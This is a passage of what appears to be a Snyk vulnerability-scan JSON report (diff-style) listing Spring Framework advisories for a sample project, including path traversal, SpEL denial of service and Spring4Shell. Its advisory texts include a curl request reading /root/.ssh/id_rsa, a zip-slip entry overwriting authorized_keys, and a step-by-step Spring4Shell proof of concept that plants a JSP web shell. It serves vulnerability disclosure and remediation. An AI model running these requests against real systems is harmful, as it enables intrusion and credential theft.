"http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": 